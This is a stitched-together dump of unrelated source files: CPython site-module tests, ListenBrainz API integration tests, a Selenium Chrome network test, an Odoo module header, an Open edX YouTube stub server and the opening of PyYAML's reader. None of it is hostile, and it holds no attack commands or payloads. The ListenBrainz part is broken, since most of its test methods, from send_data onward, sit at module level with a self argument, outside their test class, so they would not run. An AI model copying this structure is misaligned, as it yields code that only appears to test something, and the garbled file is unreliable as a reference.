        # Same tests for test_addpackage since addsitedir() essentially just
        # calls addpackage() for every .pth file in the directory
        pth_file = PthFile()
        pth_file.cleanup(prep=True)  # Make sure that nothing is pre-existing
                                     # that is tested for
        try:
            pth_file.create()
            site.addsitedir(pth_file.base_dir, set())
            self.pth_file_tests(pth_file)
        finally:
            pth_file.cleanup()

    def test_s_option(self):
        # The -s flag and PYTHONNOUSERSITE must keep the user site directory
        # off sys.path; exit codes from the subprocesses encode membership.
        usersite = site.USER_SITE
        self.assertIn(usersite, sys.path)

        env = os.environ.copy()
        rc = subprocess.call([sys.executable, '-c',
            'import sys; sys.exit(%r in sys.path)' % usersite],
            env=env)
        self.assertEqual(rc, 1)

        env = os.environ.copy()
        rc = subprocess.call([sys.executable, '-s', '-c',
            'import sys; sys.exit(%r in sys.path)' % usersite],
            env=env)
        self.assertEqual(rc, 0)

        env = os.environ.copy()
        env["PYTHONNOUSERSITE"] = "1"
        rc = subprocess.call([sys.executable, '-c',
            'import sys; sys.exit(%r in sys.path)' % usersite],
            env=env)
        self.assertEqual(rc, 0)

        env = os.environ.copy()
        env["PYTHONUSERBASE"] = "/tmp"
        rc = subprocess.call([sys.executable, '-c',
            'import sys, site; sys.exit(site.USER_BASE.startswith("/tmp"))'],
            env=env)
        self.assertEqual(rc, 1)

    def test_getuserbase(self):
        site.USER_BASE = None
        user_base = site.getuserbase()

        # the call sets site.USER_BASE
        self.assertEqual(site.USER_BASE, user_base)

        # let's set PYTHONUSERBASE and see if it uses it
        site.USER_BASE = None
        import sysconfig
        sysconfig._CONFIG_VARS = None

        with EnvironmentVarGuard() as environ:
            environ['PYTHONUSERBASE'] = 'xoxo'
            self.assertTrue(site.getuserbase().startswith('xoxo'),
                            site.getuserbase())

    def test_getusersitepackages(self):
        site.USER_SITE = None
        site.USER_BASE = None
        user_site = site.getusersitepackages()

        # the call sets USER_BASE *and* USER_SITE
        self.assertEqual(site.USER_SITE, user_site)
        self.assertTrue(user_site.startswith(site.USER_BASE), user_site)

    def test_getsitepackages(self):
        # Expected layout depends on the platform; each branch below checks
        # the directory list produced for a fake 'xoxo' prefix.
        site.PREFIXES = ['xoxo']
        dirs = site.getsitepackages()

        if sys.platform in ('os2emx', 'riscos'):
            self.assertEqual(len(dirs), 1)
            wanted = os.path.join('xoxo', 'Lib', 'site-packages')
            self.assertEqual(dirs[0], wanted)
        elif os.sep == '/':
            self.assertEqual(len(dirs), 2)
            wanted = os.path.join('xoxo', 'lib', 'python' + sys.version[:3],
                                  'site-packages')
            self.assertEqual(dirs[0], wanted)
            wanted = os.path.join('xoxo', 'lib', 'site-python')
            self.assertEqual(dirs[1], wanted)
        else:
            self.assertEqual(len(dirs), 2)
            self.assertEqual(dirs[0], 'xoxo')
            wanted = os.path.join('xoxo', 'lib', 'site-packages')
            self.assertEqual(dirs[1], wanted)

        # let's try the specific Apple location
        if (sys.platform == "darwin" and
            sysconfig.get_config_var("PYTHONFRAMEWORK")):
            site.PREFIXES = ['Python.framework']
            dirs = site.getsitepackages()
            self.assertEqual(len(dirs), 3)
            wanted = os.path.join('/Library', 'Python', sys.version[:3],
                                  'site-packages')
            self.assertEqual(dirs[2], wanted)
class PthFile(object):
    """Helper class for handling testing of .pth files"""

    def __init__(self, filename_base=TESTFN, imported="time",
                 good_dirname="__testdir__", bad_dirname="__bad"):
        """Initialize instance variables"""
        # good_dirname will exist on disk; bad_dirname deliberately will not.
        self.filename = filename_base + ".pth"
        self.base_dir = os.path.abspath('')
        self.file_path = os.path.join(self.base_dir, self.filename)
        self.imported = imported
        self.good_dirname = good_dirname
        self.bad_dirname = bad_dirname
        self.good_dir_path = os.path.join(self.base_dir, self.good_dirname)
        self.bad_dir_path = os.path.join(self.base_dir, self.bad_dirname)

    def create(self):
        """Create a .pth file with a comment, blank lines, an ``import
        <self.imported>``, a line with self.good_dirname, and a line with
        self.bad_dirname.

        Creation of the directory for self.good_dir_path (based off of
        self.good_dirname) is also performed.

        Make sure to call self.cleanup() to undo anything done by this method.
        """
        FILE = open(self.file_path, 'w')
        try:
            print("#import @bad module name", file=FILE)
            print("\n", file=FILE)
            print("import %s" % self.imported, file=FILE)
            print(self.good_dirname, file=FILE)
            print(self.bad_dirname, file=FILE)
        finally:
            FILE.close()
        os.mkdir(self.good_dir_path)

    def cleanup(self, prep=False):
        """Make sure that the .pth file is deleted, self.imported is not in
        sys.modules, and that both self.good_dirname and self.bad_dirname are
        not existing directories."""
        if os.path.exists(self.file_path):
            os.remove(self.file_path)
        if prep:
            # Preparation pass: stash any pre-existing module so the
            # restoration pass (prep=False) can put it back afterwards.
            self.imported_module = sys.modules.get(self.imported)
            if self.imported_module:
                del sys.modules[self.imported]
        else:
            if self.imported_module:
                sys.modules[self.imported] = self.imported_module
        if os.path.exists(self.good_dir_path):
            os.rmdir(self.good_dir_path)
        if os.path.exists(self.bad_dir_path):
            os.rmdir(self.bad_dir_path)
class ImportSideEffectTests(unittest.TestCase):
    """Test side-effects from importing 'site'."""

    def setUp(self):
        """Make a copy of sys.path"""
        self.sys_path = sys.path[:]

    def tearDown(self):
        """Restore sys.path"""
        sys.path[:] = self.sys_path

    def test_abs_paths(self):
        # Make sure all imported modules have their __file__ and __cached__
        # attributes as absolute paths. Arranging to put the Lib directory on
        # PYTHONPATH would cause the os module to have a relative path for
        # __file__ if abs_paths() does not get run. sys and builtins (the
        # only other modules imported before site.py runs) do not have
        # __file__ or __cached__ because they are built-in.
        parent = os.path.relpath(os.path.dirname(os.__file__))
        env = os.environ.copy()
        env['PYTHONPATH'] = parent
        code = ('import os, sys',
            # use ASCII to avoid locale issues with non-ASCII directories
            'os_file = os.__file__.encode("ascii", "backslashreplace")',
            r'sys.stdout.buffer.write(os_file + b"\n")',
            'os_cached = os.__cached__.encode("ascii", "backslashreplace")',
            r'sys.stdout.buffer.write(os_cached + b"\n")')
        command = '\n'.join(code)
        # First, prove that with -S (no 'import site'), the paths are
        # relative.
        proc = subprocess.Popen([sys.executable, '-S', '-c', command],
                                env=env,
                                stdout=subprocess.PIPE)
        stdout, stderr = proc.communicate()

        self.assertEqual(proc.returncode, 0)
        os__file__, os__cached__ = stdout.splitlines()[:2]
        self.assertFalse(os.path.isabs(os__file__))
        self.assertFalse(os.path.isabs(os__cached__))
        # Now, with 'import site', it works.
        proc = subprocess.Popen([sys.executable, '-c', command],
                                env=env,
                                stdout=subprocess.PIPE)
        stdout, stderr = proc.communicate()
        self.assertEqual(proc.returncode, 0)
        os__file__, os__cached__ = stdout.splitlines()[:2]
        self.assertTrue(os.path.isabs(os__file__))
        self.assertTrue(os.path.isabs(os__cached__))

    def test_no_duplicate_paths(self):
        # No duplicate paths should exist in sys.path
        # Handled by removeduppaths()
        site.removeduppaths()
        seen_paths = set()
        for path in sys.path:
            self.assertNotIn(path, seen_paths)
            seen_paths.add(path)

    def test_add_build_dir(self):
        # Test that the build directory's Modules directory is used when it
        # should be.
        # XXX: implement
        pass

    def test_setting_quit(self):
        # 'quit' and 'exit' should be injected into builtins
        self.assertTrue(hasattr(builtins, "quit"))
        self.assertTrue(hasattr(builtins, "exit"))

    def test_setting_copyright(self):
        # 'copyright' and 'credits' should be in builtins
        self.assertTrue(hasattr(builtins, "copyright"))
        self.assertTrue(hasattr(builtins, "credits"))

    def test_setting_help(self):
        # 'help' should be set in builtins
        self.assertTrue(hasattr(builtins, "help"))

    def test_aliasing_mbcs(self):
        # On Windows with a cp* locale, some encoding alias must map to
        # "mbcs"; the for/else fails the test if no alias was found.
        if sys.platform == "win32":
            import locale
            if locale.getdefaultlocale()[1].startswith('cp'):
                for value in encodings.aliases.aliases.values():
                    if value == "mbcs":
                        break
                else:
                    self.fail("did not alias mbcs")

    def test_sitecustomize_executed(self):
        # If sitecustomize is available, it should have been imported.
        if "sitecustomize" not in sys.modules:
            try:
                import sitecustomize
            except ImportError:
                pass
            else:
                self.fail("sitecustomize not imported automatically")
def test_main():
    # Entry point used by the Lib/test regrtest machinery.
    run_unittest(HelperFunctionsTests, ImportSideEffectTests)

if __name__ == "__main__":
    test_main()
| apache-2.0 |
paramsingh/listenbrainz-server | listenbrainz/tests/integration/test_api.py | 1 | 19685 | import sys
import os
import uuid
from listenbrainz.tests.integration import IntegrationTestCase
from flask import url_for
from redis import Redis
import listenbrainz.db.user as db_user
import time
import json
from listenbrainz.webserver.views.api_tools import is_valid_uuid
class APITestCase(IntegrationTestCase):
    def setUp(self):
        # Create (or fetch) a throwaway user; tests authenticate with its token.
        super(APITestCase, self).setUp()
        self.user = db_user.get_or_create(1, 'testuserpleaseignore')
    def tearDown(self):
        # Flush Redis so listens submitted by one test don't leak into the next.
        r = Redis(host=self.app.config['REDIS_HOST'], port=self.app.config['REDIS_PORT'])
        r.flushall()
        super(APITestCase, self).tearDown()
    def test_get_listens(self):
        """ Test to make sure that the api sends valid listens on get requests.
        """
        with open(self.path_to_data_file('valid_single.json'), 'r') as f:
            payload = json.load(f)

        # send a listen
        ts = int(time.time())
        payload['payload'][0]['listened_at'] = ts
        response = self.send_data(payload)
        self.assert200(response)
        self.assertEqual(response.json['status'], 'ok')

        # This sleep allows for the influx subscriber to take its time in getting
        # the listen submitted from redis and writing it to influx.
        # Removing it causes an empty list of listens to be returned.
        time.sleep(2)

        url = url_for('api_v1.get_listens', user_name = self.user['musicbrainz_id'])
        response = self.client.get(url, query_string = {'count': '1'})
        self.assert200(response)
        data = json.loads(response.data)['payload']

        # make sure user id is correct
        self.assertEqual(data['user_id'], self.user['musicbrainz_id'])

        # make sure that count is 1 and list also contains 1 listen
        self.assertEqual(data['count'], 1)
        self.assertEqual(len(data['listens']), 1)

        # make sure timestamp is the same as sent
        sent_time = payload['payload'][0]['listened_at']
        self.assertEqual(data['listens'][0]['listened_at'], sent_time)
        self.assertEqual(data['listens'][0]['track_metadata']['track_name'], 'Fade')
        self.assertEqual(data['listens'][0]['track_metadata']['artist_name'], 'Kanye West')
        self.assertEqual(data['listens'][0]['track_metadata']['release_name'], 'The Life of Pablo')

        # make sure that artist msid, release msid and recording msid are present in data
        self.assertTrue(is_valid_uuid(data['listens'][0]['recording_msid']))
        self.assertTrue(is_valid_uuid(data['listens'][0]['track_metadata']['additional_info']['artist_msid']))
        self.assertTrue(is_valid_uuid(data['listens'][0]['track_metadata']['additional_info']['release_msid']))

        # check for latest listen timestamp
        self.assertEqual(data['latest_listen_ts'], ts)

        # request with min_ts should work
        response = self.client.get(url, query_string = {'min_ts': int(time.time())})
        self.assert200(response)

        # request with max_ts lesser than the timestamp of the submitted listen
        # should not send back any listens, should report a good latest_listen timestamp
        response = self.client.get(url, query_string = {'max_ts': ts - 2})
        self.assert200(response)
        self.assertListEqual(response.json['payload']['listens'], [])
        self.assertEqual(response.json['payload']['latest_listen_ts'], ts)

        # check that recent listens are fetched correctly
        url = url_for('api_v1.get_recent_listens_for_user_list', user_list = self.user['musicbrainz_id'])
        response = self.client.get(url, query_string = {'count': '1'})
        self.assert200(response)
        data = json.loads(response.data)['payload']
        self.assertEqual(data['count'], 2)
def send_data(self, payload):
    """POST ``payload`` to the listen-submission endpoint and return the response.

    The request is authenticated with this test user's token and sent as JSON.
    """
    auth_headers = {'Authorization': 'Token {}'.format(self.user['auth_token'])}
    return self.client.post(
        url_for('api_v1.submit_listen'),
        data=json.dumps(payload),
        headers=auth_headers,
        content_type='application/json',
    )
def test_unauthorized_submission(self):
    """Submissions without a valid auth token must be rejected with 401."""
    with open(self.path_to_data_file('valid_single.json')) as handle:
        payload = json.load(handle)

    submit_url = url_for('api_v1.submit_listen')
    body = json.dumps(payload)

    # No Authorization header at all.
    response = self.client.post(
        submit_url,
        data=body,
        content_type='application/json'
    )
    self.assert401(response)
    self.assertEqual(response.json['code'], 401)

    # Authorization header present, but the token is bogus.
    response = self.client.post(
        submit_url,
        data=body,
        headers={'Authorization': 'Token testtokenplsignore'},
        content_type='application/json'
    )
    self.assert401(response)
    self.assertEqual(response.json['code'], 401)
def test_valid_single(self):
    """A well-formed submission of listen_type 'single' is accepted."""
    with open(self.path_to_data_file('valid_single.json')) as handle:
        payload = json.load(handle)

    response = self.send_data(payload)

    self.assert200(response)
    self.assertEqual('ok', response.json['status'])
def test_single_more_than_one_listen(self):
    """listen_type 'single' with more than one listen in the payload is a 400."""
    with open(self.path_to_data_file('single_more_than_one_listen.json')) as handle:
        payload = json.load(handle)

    response = self.send_data(payload)

    self.assert400(response)
    self.assertEqual(400, response.json['code'])
def test_valid_playing_now(self):
    """A well-formed 'playing_now' submission is accepted and retrievable."""
    with open(self.path_to_data_file('valid_playing_now.json')) as handle:
        payload = json.load(handle)

    response = self.send_data(payload)
    self.assert200(response)
    self.assertEqual(response.json['status'], 'ok')

    # The listen should now appear as the user's playing-now entry.
    playing_now = self.client.get(
        url_for('api_v1.get_playing_now', user_name=self.user['musicbrainz_id']))
    self.assert200(playing_now)
    self.assertEqual(playing_now.json['payload']['count'], 1)
def test_playing_now_with_duration(self):
    """A playing_now listen that carries a 'duration' field expires after it."""
    with open(self.path_to_data_file('playing_now_with_duration.json')) as handle:
        payload = json.load(handle)

    response = self.send_data(payload)
    self.assert200(response)
    self.assertEqual(response.json['status'], 'ok')

    now_url = url_for('api_v1.get_playing_now',
                      user_name=self.user['musicbrainz_id'])

    # Immediately after submission the listen is visible.
    result = self.client.get(now_url)
    self.assertEqual(result.json['payload']['count'], 1)
    self.assertEqual(
        result.json['payload']['listens'][0]['track_metadata']['track_name'],
        'Fade')

    # Wait past the submitted duration; the playing-now entry must be gone.
    time.sleep(1.1)
    result = self.client.get(now_url)
    self.assertEqual(result.json['payload']['count'], 0)
def test_playing_now_with_duration_ms(self):
    """A playing_now listen that carries 'duration_ms' also expires after it."""
    with open(self.path_to_data_file('playing_now_with_duration_ms.json')) as handle:
        payload = json.load(handle)

    response = self.send_data(payload)
    self.assert200(response)
    self.assertEqual(response.json['status'], 'ok')

    now_url = url_for('api_v1.get_playing_now',
                      user_name=self.user['musicbrainz_id'])

    # Immediately after submission the listen is visible.
    result = self.client.get(now_url)
    self.assertEqual(result.json['payload']['count'], 1)
    self.assertEqual(
        result.json['payload']['listens'][0]['track_metadata']['track_name'],
        'Fade')

    # Wait past the submitted duration; the playing-now entry must be gone.
    time.sleep(1.1)
    result = self.client.get(now_url)
    self.assertEqual(result.json['payload']['count'], 0)
def test_playing_now_with_ts(self):
    """playing_now submissions must not carry 'listened_at'; expect a 400."""
    with open(self.path_to_data_file('playing_now_with_ts.json')) as handle:
        payload = json.load(handle)

    response = self.send_data(payload)

    self.assert400(response)
    self.assertEqual(400, response.json['code'])
def test_playing_now_more_than_one_listen(self):
    """playing_now with more than one listen in the payload is a 400."""
    with open(self.path_to_data_file('playing_now_more_than_one_listen.json')) as handle:
        payload = json.load(handle)

    response = self.send_data(payload)

    self.assert400(response)
    self.assertEqual(400, response.json['code'])
def test_valid_import(self):
    """A well-formed submission of listen_type 'import' is accepted."""
    with open(self.path_to_data_file('valid_import.json')) as handle:
        payload = json.load(handle)

    response = self.send_data(payload)

    self.assert200(response)
    self.assertEqual('ok', response.json['status'])
def test_too_large_listen(self):
    """A submission whose overall listen size exceeds 10240 bytes is a 400."""
    with open(self.path_to_data_file('too_large_listen.json')) as handle:
        payload = json.load(handle)

    response = self.send_data(payload)

    self.assert400(response)
    self.assertEqual(400, response.json['code'])
def test_too_many_tags_in_listen(self):
    """A listen with more than the allowed number of tags in additional_info is a 400."""
    with open(self.path_to_data_file('too_many_tags.json')) as handle:
        payload = json.load(handle)

    response = self.send_data(payload)

    self.assert400(response)
    self.assertEqual(400, response.json['code'])
def test_too_long_tag(self):
    """A listen containing a tag longer than 64 characters is a 400."""
    with open(self.path_to_data_file('too_long_tag.json')) as handle:
        payload = json.load(handle)

    response = self.send_data(payload)

    self.assert400(response)
    self.assertEqual(400, response.json['code'])
def test_invalid_release_mbid(self):
    """A listen whose additional_info carries a malformed release_mbid is a 400."""
    with open(self.path_to_data_file('invalid_release_mbid.json')) as handle:
        payload = json.load(handle)

    response = self.send_data(payload)

    self.assert400(response)
    self.assertEqual(400, response.json['code'])
def test_invalid_artist_mbid(self):
    """A listen whose additional_info carries a malformed artist_mbid is a 400."""
    with open(self.path_to_data_file('invalid_artist_mbid.json')) as handle:
        payload = json.load(handle)

    response = self.send_data(payload)

    self.assert400(response)
    self.assertEqual(400, response.json['code'])
def test_invalid_recording_mbid(self):
    """A listen whose additional_info carries a malformed recording_mbid is a 400."""
    with open(self.path_to_data_file('invalid_recording_mbid.json')) as handle:
        payload = json.load(handle)

    response = self.send_data(payload)

    self.assert400(response)
    self.assertEqual(400, response.json['code'])
def test_additional_info(self):
    """User-supplied additional_info fields survive the submit/fetch round trip."""
    with open(self.path_to_data_file('additional_info.json')) as handle:
        payload = json.load(handle)
    payload['payload'][0]['listened_at'] = int(time.time())

    response = self.send_data(payload)
    self.assert200(response)
    self.assertEqual(response.json['status'], 'ok')

    # Give the influx-writer time to persist the listen before reading it back.
    time.sleep(2)
    listens_url = url_for('api_v1.get_listens', user_name=self.user['musicbrainz_id'])
    response = self.client.get(listens_url, query_string={'count': '1'})
    self.assert200(response)
    data = json.loads(response.data)['payload']

    sent = payload['payload'][0]['track_metadata']['additional_info']
    received = data['listens'][0]['track_metadata']['additional_info']

    # Scalar and list fields are preserved as-is; the nested dict comes back
    # flattened with a dotted key, and tracknumber is coerced to an int.
    self.assertEqual(sent['best_song'], received['best_song'])
    self.assertEqual(sent['link1'], received['link1'])
    self.assertEqual(sent['link2'], received['link2'])
    self.assertEqual(sent['other_stuff'], received['other_stuff'])
    self.assertEqual(sent['nested']['info'], received['nested.info'])
    self.assertListEqual(sent['release_type'], received['release_type'])
    self.assertEqual(sent['spotify_id'], received['spotify_id'])
    self.assertEqual(sent['isrc'], received['isrc'])
    self.assertEqual(int(sent['tracknumber']), received['tracknumber'])
    self.assertEqual(sent['release_group_mbid'], received['release_group_mbid'])
    self.assertListEqual(sent['work_mbids'], received['work_mbids'])
    self.assertListEqual(sent['artist_mbids'], received['artist_mbids'])
    self.assertListEqual(sent['non_official_list'], received['non_official_list'])

    # The core track fields must not appear inside additional_info.
    for key in ('track_name', 'artist_name', 'release_name'):
        self.assertNotIn(key, sent)
def test_latest_import(self):
    """latest_import starts at 0 and reflects the last POSTed timestamp."""
    import_url = url_for('api_v1.latest_import')
    query = {'user_name': self.user['musicbrainz_id']}

    # Before any update the endpoint reports 0.
    response = self.client.get(import_url, query_string=query)
    self.assert200(response)
    data = json.loads(response.data)
    self.assertEqual(data['musicbrainz_id'], self.user['musicbrainz_id'])
    self.assertEqual(data['latest_import'], 0)

    # POST a new timestamp on behalf of the user.
    val = int(time.time())
    response = self.client.post(
        import_url,
        data=json.dumps({'ts': val}),
        headers={'Authorization': 'Token {token}'.format(token=self.user['auth_token'])}
    )
    self.assert200(response)
    self.assertEqual(response.json['status'], 'ok')

    # The stored value must now match what was posted.
    response = self.client.get(import_url, query_string=query)
    self.assert200(response)
    data = json.loads(response.data)
    self.assertEqual(data['musicbrainz_id'], self.user['musicbrainz_id'])
    self.assertEqual(data['latest_import'], val)
def test_latest_import_unauthorized(self):
    """POSTing to latest_import with an invalid token returns 401."""
    response = self.client.post(
        url_for('api_v1.latest_import'),
        data=json.dumps({'ts': int(time.time())}),
        headers={'Authorization': 'Token thisisinvalid'}
    )
    self.assert401(response)
    self.assertEqual(401, response.json['code'])
def test_latest_import_unknown_user(self):
    """latest_import with an empty user_name returns 404."""
    response = self.client.get(url_for('api_v1.latest_import'),
                               query_string={'user_name': ''})
    self.assert404(response)
    self.assertEqual(404, response.json['code'])
def test_multiple_artist_names(self):
    """artist_name given as a list is rejected with a descriptive 400."""
    with open(self.path_to_data_file('artist_name_list.json')) as handle:
        payload = json.load(handle)

    response = self.send_data(payload)

    self.assert400(response)
    self.assertEqual(400, response.json['code'])
    self.assertEqual(response.json['error'], 'artist_name must be a single string.')
def test_too_high_timestamps(self):
    """Timestamps greater than the current time (e.g. nanoseconds) are a 400."""
    with open(self.path_to_data_file('timestamp_in_ns.json')) as handle:
        payload = json.load(handle)
    # NOTE(review): this sets a top-level 'listened_at' key, while per-listen
    # timestamps live in payload['payload'][0]; the fixture file itself seems
    # to carry the ns-scale timestamp that triggers the rejection — confirm.
    payload['listened_at'] = int(time.time()) * 10 ** 9

    response = self.send_data(payload)

    self.assert400(response)
    self.assertEqual(400, response.json['code'])
    self.assertEqual(response.json['error'], 'Value for key listened_at is too high.')
def test_invalid_token_validation(self):
    """validate_token reports an invalid token as such, without a user_name."""
    response = self.client.get(url_for('api_v1.validate_token'),
                               query_string={"token": "invalidtoken"})
    self.assert200(response)
    self.assertEqual(response.json['code'], 200)
    self.assertEqual(response.json['message'], 'Token invalid.')
    self.assertFalse(response.json['valid'])
    self.assertNotIn('user_name', response.json)
def test_valid_token_validation(self):
    """validate_token reports a valid token and echoes the owning user_name."""
    response = self.client.get(url_for('api_v1.validate_token'),
                               query_string={"token": self.user['auth_token']})
    self.assert200(response)
    self.assertEqual(response.json['code'], 200)
    self.assertEqual(response.json['message'], 'Token valid.')
    self.assertTrue(response.json['valid'])
    self.assertEqual(response.json['user_name'], self.user['musicbrainz_id'])
def test_get_playing_now(self):
    """get_playing_now 404s for unknown users, is empty before a submission,
    and returns the submitted playing_now listen afterwards.
    """
    # Unknown user -> 404.
    result = self.client.get(url_for('api_v1.get_playing_now',
                                     user_name='thisuserdoesnotexist'))
    self.assert404(result)

    now_url = url_for('api_v1.get_playing_now',
                      user_name=self.user['musicbrainz_id'])

    # Nothing submitted yet -> empty payload.
    result = self.client.get(now_url)
    self.assertEqual(result.json['payload']['count'], 0)
    self.assertEqual(len(result.json['payload']['listens']), 0)

    # Submit a playing_now listen.
    with open(self.path_to_data_file('valid_playing_now.json')) as handle:
        payload = json.load(handle)
    response = self.send_data(payload)
    self.assert200(response)
    self.assertEqual(response.json['status'], 'ok')

    # The listen must now be reported for the user.
    result = self.client.get(now_url)
    body = result.json['payload']
    self.assertTrue(body['playing_now'])
    self.assertEqual(body['count'], 1)
    self.assertEqual(len(body['listens']), 1)
    self.assertEqual(body['user_id'], self.user['musicbrainz_id'])
    track = body['listens'][0]['track_metadata']
    self.assertEqual(track['artist_name'], 'Kanye West')
    self.assertEqual(track['release_name'], 'The Life of Pablo')
    self.assertEqual(track['track_name'], 'Fade')
| gpl-2.0 |
krmahadevan/selenium | py/test/selenium/webdriver/chrome/chrome_network_emulation_tests.py | 29 | 1252 | # Licensed to the Software Freedom Conservancy (SFC) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The SFC licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from selenium.webdriver import Chrome
def test_network_conditions_emulation():
    """Set emulated network conditions on a Chrome session and read them back.

    Chrome takes a single ``throughput`` value and reports it as both the
    download and the upload throughput.
    """
    driver = Chrome()
    try:
        driver.set_network_conditions(
            offline=False,
            latency=56,  # additional latency (ms)
            throughput=789)
        conditions = driver.get_network_conditions()
        assert conditions['offline'] is False
        assert conditions['latency'] == 56
        assert conditions['download_throughput'] == 789
        assert conditions['upload_throughput'] == 789
    finally:
        # Always tear the browser down, even when an assertion fails,
        # so a failing test does not leak a Chrome process.
        driver.quit()
| apache-2.0 |
nicolas-petit/website | website_no_crawler/__init__.py | 26 | 1025 | # -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# This module copyright (C) 2015 B-Informed (<http://www.b-informed.nl>).
# Author: Roel Adriaans
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
| agpl-3.0 |
shubhdev/openedx | common/djangoapps/terrain/stubs/youtube.py | 39 | 6111 | """
Stub implementation of YouTube for acceptance tests.
To start this stub server on its own from Vagrant:
1.) Locally, modify your Vagrantfile so that it contains:
config.vm.network :forwarded_port, guest: 8031, host: 8031
2.) From within Vagrant dev environment do:
cd common/djangoapps/terrain
python -m stubs.start youtube 8031
3.) Locally, try accessing http://localhost:8031/ and see that
you get "Unused url" message inside the browser.
"""
from .http import StubHttpRequestHandler, StubHttpService
import json
import time
import requests
from urlparse import urlparse
from collections import OrderedDict
class StubYouTubeHandler(StubHttpRequestHandler):
    """
    A handler for Youtube GET requests.
    """

    # Default number of seconds to delay the response to simulate network latency.
    DEFAULT_DELAY_SEC = 0.5

    def do_DELETE(self):  # pylint: disable=invalid-name
        """
        Allow callers to delete all the server configurations using the /del_config URL.
        """
        if self.path == "/del_config" or self.path == "/del_config/":
            self.server.config = dict()
            self.log_message("Reset Server Configuration.")
            self.send_response(200)
        else:
            self.send_response(404)

    def do_GET(self):
        """
        Handle a GET request from the client and sends response back.

        Dispatches on substrings of the request path:
        'get_config', 'test_transcripts_youtube', 'test_youtube',
        'get_youtube_api'; anything else gets a 404.
        """
        self.log_message(
            "Youtube provider received GET request to path {}".format(self.path)
        )

        if 'get_config' in self.path:
            self.send_json_response(self.server.config)

        elif 'test_transcripts_youtube' in self.path:
            # Canned transcript XML used by the transcript-comparison tests.
            if 't__eq_exist' in self.path:
                status_message = "".join([
                    '<?xml version="1.0" encoding="utf-8" ?>',
                    '<transcript><text start="1.0" dur="1.0">',
                    'Equal transcripts</text></transcript>'
                ])
                self.send_response(
                    200, content=status_message, headers={'Content-type': 'application/xml'}
                )
            elif 't_neq_exist' in self.path:
                status_message = "".join([
                    '<?xml version="1.0" encoding="utf-8" ?>',
                    '<transcript><text start="1.1" dur="5.5">',
                    'Transcripts sample, different that on server',
                    '</text></transcript>'
                ])
                self.send_response(
                    200, content=status_message, headers={'Content-type': 'application/xml'}
                )
            else:
                self.send_response(404)

        elif 'test_youtube' in self.path:
            # The youtube video id is the last component of the request path.
            params = urlparse(self.path)
            youtube_id = params.path.split('/').pop()

            if self.server.config.get('youtube_api_private_video'):
                self._send_private_video_response(youtube_id, "I'm youtube private video.")
            else:
                self._send_video_response(youtube_id, "I'm youtube.")

        elif 'get_youtube_api' in self.path:
            if self.server.config.get('youtube_api_blocked'):
                self.send_response(404, content='', headers={'Content-type': 'text/plain'})
            else:
                # Get the response to send from YouTube.
                # We need to do this every time because Google sometimes sends different responses
                # as part of their own experiments, which has caused our tests to become "flaky"
                self.log_message("Getting iframe api from youtube.com")
                iframe_api_response = requests.get('https://www.youtube.com/iframe_api').content.strip("\n")
                self.send_response(200, content=iframe_api_response, headers={'Content-type': 'text/html'})

        else:
            self.send_response(
                404, content="Unused url", headers={'Content-type': 'text/plain'}
            )

    def _send_video_response(self, youtube_id, message):
        """
        Send message back to the client for video player requests.
        Requires sending back callback id.
        """
        # Delay the response to simulate network latency
        time.sleep(self.server.config.get('time_to_response', self.DEFAULT_DELAY_SEC))

        # Construct the JSONP response content: metadata for the requested
        # video id, wrapped in the caller-supplied callback.
        callback = self.get_params['callback']
        youtube_metadata = json.loads(
            requests.get(
                "http://gdata.youtube.com/feeds/api/videos/{id}?v=2&alt=jsonc".format(id=youtube_id)
            ).text
        )
        data = OrderedDict({
            'data': OrderedDict({
                'id': youtube_id,
                'message': message,
                'duration': youtube_metadata['data']['duration'],
            })
        })
        response = "{cb}({data})".format(cb=callback, data=json.dumps(data))

        self.send_response(200, content=response, headers={'Content-type': 'text/html'})
        self.log_message("Youtube: sent response {}".format(message))

    def _send_private_video_response(self, youtube_id, message):
        """
        Send private video error message back to the client for video player requests.

        ``youtube_id`` identifies the requested (private) video; it is accepted
        to match the caller in ``do_GET`` but does not appear in the error
        payload, mirroring the real GData error format.

        Fix: previously this method only accepted ``message``, while ``do_GET``
        called it with ``(youtube_id, message)``, raising TypeError whenever
        the 'youtube_api_private_video' config flag was set.
        """
        # Construct the JSONP error response wrapped in the caller's callback.
        callback = self.get_params['callback']
        data = OrderedDict({
            "error": OrderedDict({
                "code": 403,
                "errors": [
                    {
                        "code": "ServiceForbiddenException",
                        "domain": "GData",
                        "internalReason": "Private video"
                    }
                ],
                "message": message,
            })
        })
        response = "{cb}({data})".format(cb=callback, data=json.dumps(data))
        self.send_response(200, content=response, headers={'Content-type': 'text/html'})
        self.log_message("Youtube: sent response {}".format(message))
class StubYouTubeService(StubHttpService):
    """
    A stub Youtube provider server that responds to GET requests to localhost.
    """
    # Request handler class instantiated by the stub HTTP server
    # for each incoming connection.
    HANDLER_CLASS = StubYouTubeHandler
| agpl-3.0 |
nchursin/json2apex | helpers/pyyaml/reader.py | 272 | 6854 | # This module contains abstractions for the input stream. You don't have to
# looks further, there are no pretty code.
#
# We define two classes here.
#
# Mark(source, line, column)
# It's just a record and its only use is producing nice error messages.
# Parser does not use it for any other purposes.
#
# Reader(source, data)
# Reader determines the encoding of `data` and converts it to unicode.
# Reader provides the following methods and attributes:
# reader.peek(length=1) - return the next `length` characters
# reader.forward(length=1) - move the current position to `length` characters.
# reader.index - the number of the current character.
# reader.line, stream.column - the line and the column of the current character.
__all__ = ['Reader', 'ReaderError']
from .error import YAMLError, Mark
import codecs, re
class ReaderError(YAMLError):
    """Raised when the input stream contains undecodable or disallowed data."""

